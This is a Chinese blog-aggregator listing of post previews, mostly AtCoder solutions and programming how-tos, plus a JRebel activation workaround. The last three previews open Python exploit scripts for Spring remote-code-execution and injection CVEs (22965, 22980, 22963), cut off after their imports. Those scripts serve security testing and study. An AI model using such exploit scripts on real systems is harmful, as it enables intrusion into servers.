greatest atcoder world 2022

Jrebel 2022.4.1 激活

1.高版本的jrebel可能激活失败,这里我们采用的离线安装低版本,再进行激活 jrebel下载网址:https://plugins.jetbrains.com/plugin/4441-jrebel-and-xrebel/versions 2.然后把压缩包解压到idea安装目录的plugins目录里 ......
激活 Jrebel 2022

AtCoder Regular Contest 139 E Wazir

[洛谷传送门](https://www.luogu.com.cn/problem/AT_arc139_e "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/arc139/tasks/arc139_e "AtCoder 传送门") 好题。 这种题一般 ......
AtCoder Regular Contest Wazir 139

AtCoder做题记录

## AtCoder做题记录 #### [[ARC082F] Sandglass](https://www.luogu.com.cn/problem/AT_arc082_d) 题意:有一个沙漏,每秒会有1g沙子从上面落下来,有$k$个时刻$r_1,r_2\cdots r_k$,每到$r_i$沙漏就会 ......
AtCoder

【游记】2022 CSP-S 游寄

* 2023.5.25 终于决定放出这段黑历史了 既然是游寄,那肯定是寄了。 ### Day 0 上午打了一场比赛,心态直接到崩了,又拿了一次倒数第一(呜呜,有6个人ak,我才233分)。 一点半坐上小巴开往杭州,路上很无聊,想睡但路有点颠簸,头撞的有点痛,于是拿了一本《精神明亮的人》在车上看,反正 ......
游记 CSP-S 2022 CSP

【atcoder begin 302】【e题 Isolation 】JAVA的快速输入输出

import java.io.*; import java.util.HashSet; import java.util.Set; /** * @author fishcanfly */ public class Main { public static void main(String[] arg ......
Isolation atcoder begin JAVA 302

【python基础】编写/运行hello world项目

# 1.编写hello world项目 编程界每种语言的第一个程序往往都是输出hello world。因此我们来看看,如何用Python输出hello world。 1.如果你是初学者,main.py中的代码暂时是无法看懂的,所以可以把main中的源代码直接删除。如下所示 ![image](http ......
基础 项目 python hello world

VS2022默认创建类的访问修饰符为internal问题

# VS2022默认创建类的访问修饰符为internal问题 由于创建类是根据模板文件生成的,所里这里我们需要修改以下vs自带的模板 1. 找到模板位置 通常情况位于你的{安装位置}\Microsoft Visual Studio\2022\{安装的版本:比如(Preview,Professiona ......
internal 问题 2022 VS

AtCoder Beginner Contest 300(E,F)

# AtCoder Beginner Contest 300(E,F) ## E (概率dp) [E](https://atcoder.jp/contests/abc300/tasks/abc300_e) 这个题意大致就是一开始有一个初始数$x$为$1$,然后我们有一个骰子,最后得到的点数概率一样, ......
Beginner AtCoder Contest 300

AtCoder Beginner Contest 302

# A - Attack ```cpp #include using namespace std; #define int long long int32_t main() { int a , b; cin >> a >> b; cout using namespace std; #define i ......
Beginner AtCoder Contest 302

AtCoder Regular Contest 146 D >=<

[洛谷传送门](https://www.luogu.com.cn/problem/AT_arc146_d "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/arc146/tasks/arc146_d "AtCoder 传送门") 考虑直接增量构造。 ......
AtCoder Regular Contest 146 gt

Windows Server 2022 中文版、英文版下载 (updated May 2023)

Windows Server 2022 正式版,2023 年 5 月更新 请访问原文链接:,查看最新版。原创作品,转载请保留出处。 作者主页:[sysin.org](https://sysin.org) ![Windows Server 2022 界面一览](https://sysin.org/bl ......
英文版 中文版 Windows updated Server

AtCoder Beginner Contest 193 F Zebraness

[洛谷传送门](https://www.luogu.com.cn/problem/AT_abc193_f "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/abc193/tasks/abc193_f "AtCoder 传送门") 复习一下最小割。 ......
Zebraness Beginner AtCoder Contest 193

GB28181-2022中的封装编码要求

术语: GB28181的传输要求: 国标协议的封装和编码要求:注意国标GB28181只支持RTP+PS;尽管RTP内的内容可以是PS/TS /ES ,但是国标协议传输的只是 RTP+ PS,PS封装的编码类型可以有多种; 国标码流RTP-PS 内部的一些参数【PSM,PT等】: 如果不限制国标流,R ......
编码 28181 2022 GB

AtCoder Regular Contest 146 C Even XOR

[洛谷传送门](https://www.luogu.com.cn/problem/AT_arc146_c "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/arc146/tasks/arc146_c "AtCoder 传送门") 好可爱的题啊。 没 ......
AtCoder Regular Contest Even 146

AtCoder Beginner Contest 302 H. Ball Collector 题解

[AtCoder Beginner Contest 302 H. Ball Collector](https://atcoder.jp/contests/abc302/tasks/abc302_h) 题意跳过。 可以视作将 $a_i, b_i$ 之间连了一条边,然后 $a_i, b_i$ 之间只能选 ......
题解 Collector Beginner AtCoder Contest

hello-world7843 实验六 软件开发案例(2)补充作业

|项目 | 内容| | | | | 课程班级博客链接 | [2023年春软件工程(2020级计算机科学与技术)](https://edu.cnblogs.com/campus/xbsf/2020CSSE) | | 这个作业要求链接 | [实验六 软件开发案例(2)补充作业](https://edu. ......
hello-world 软件开发 案例 hello world

AtCoder Beginner Contest 267 Ex Odd Sum

[洛谷传送门](https://www.luogu.com.cn/problem/AT_abc267_h "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/abc267/tasks/abc267_h "AtCoder 传送门") 直接暴力跑背包的复 ......
Beginner AtCoder Contest 267 Odd

2022-2023年的jlu.test,和校园网出口的流量备忘

2022年8月疫情结束,学生开学,jlu.test流量升高;2023年12月疫情放开,学生提前离校流量下降;2023年2月学生开始返校;2023年4月末除了南岭校区,其他校区的流量都切换到本地。 2022年下半年的几次封校,流量出现陡增。今年流量比较正常,5月1日放假,流量下降不少。 2022032 ......
校园网 流量 校园 2022 2023

AtCoder Beginner Contest 302(E,F,G)

# AtCoder Beginner Contest 302(E,F,G) ## E(图,set) [E](https://atcoder.jp/contests/abc302/tasks/abc302_e) 这个题意大致为一开始给出$n$个点,没有一条边,后面陆续会有$q$次操作,以下两种方式 $ ......
Beginner AtCoder Contest 302

AtCoder Regular Contest 139 D Priority Queue 2

[洛谷传送门](https://www.luogu.com.cn/problem/AT_arc139_d "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/arc139/tasks/arc139_d "AtCoder 传送门") 看成方案数想了 1 ......
Priority AtCoder Regular Contest Queue

2022年第十四届四川省大学生程序设计大赛 A

A Adjacent Swapping 题意: 给定一个字符串,每次可以移动相邻字符,求最小移动次数可以把它变成s+s这样左右两边相同的字符串。 思路: 1:我们知道他一定是偶数长度,所以我们把字符串分成两部分s1和s2 2:贪心的扫描一遍这个字符串,s1就是前一半,然后计算在满足这一般的时候他要移 ......
程序设计 年第 大学生 程序 大学

tornado-入门--Hello,world

# -*- coding: utf-8 -*- """ Programming will never have bugs, Buddha bless you """ """ @Author : Snake Tom Luck @File : Tornado-Hello-World.py @Time : ......
tornado Hello world

GB/T28181-2022针对H.265、AAC的说明和技术实现

GB/T28181-2022规范说明 GB/T28181-2022相对来GB/T28181-2016针对H.265、AAC的更新如下: ——更改了“联网系统通信协议结构图”,媒体流通道增加了 H.265、G.722.1、AAC(见 4.3.1, 2016 年版的 4.3.1)。 ——增加了对 H.2 ......
28181 技术 2022 265 AAC

AtCoder Regular Contest 132 E Paw

[洛谷传送门](https://www.luogu.com.cn/problem/AT_arc132_e "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/arc132/tasks/arc132_e "AtCoder 传送门") 感觉挺 educa ......
AtCoder Regular Contest 132 Paw

AtCoder Regular Contest 132 F Takahashi The Strongest

[洛谷传送门](https://www.luogu.com.cn/problem/AT_arc132_f "洛谷传送门") [AtCoder 传送门](https://atcoder.jp/contests/arc132/tasks/arc132_f "AtCoder 传送门") 没见过这种在新运算 ......
Takahashi Strongest AtCoder Regular Contest

蓝桥杯2022年第十三届决赛真题-斐波那契数组(动态规划)

## 题目描述 如果数组 A = (a0, a1, · · · , an−1) 满足以下条件,就说它是一个斐波那契数组: 1. n ≥ 2; 2. a0 = a1; 3. 对于所有的 i(i ≥ 2),都满足 ai = ai−1 + ai−2。 现在,给出一个数组 A ,你可以执行任意次修改,每次修 ......
蓝桥 数组 真题 年第 动态

2022 暑 模板归纳

# 目录 1. 手写栈 2. 队列 3. 广度优先级搜索 4. 并查集 5. 哈希 ### 一.手写栈 栈 的函数 s.push(x) s.pop() s.top() s.size() s.empty() ```cpp // 手写栈 int x,p=0; int s[10000005]; void ......
模板 2022

CVE-2022-22965

```python # CVE-2022-22965:Spring远程代码执行 import requests import argparse import time import re import base64 import urllib.parse header = { "Accept-Enc ......
22965 2022 CVE

CVE-2022-22980

```python #CVE-2022-22980 Spring Data MongoDB SpEL表达式注入 import requests import urllib import base64 import argparse def poc(url,ip,prot): urll=f'{url} ......
22980 2022 CVE

CVE-2022-22963

```python # Spring Cloud Function SpEL 代码注入 (CVE-2022-22963) import requests import argparse import base64 headers = { "Accept-Encoding": "gzip, defla ......
22963 2022 CVE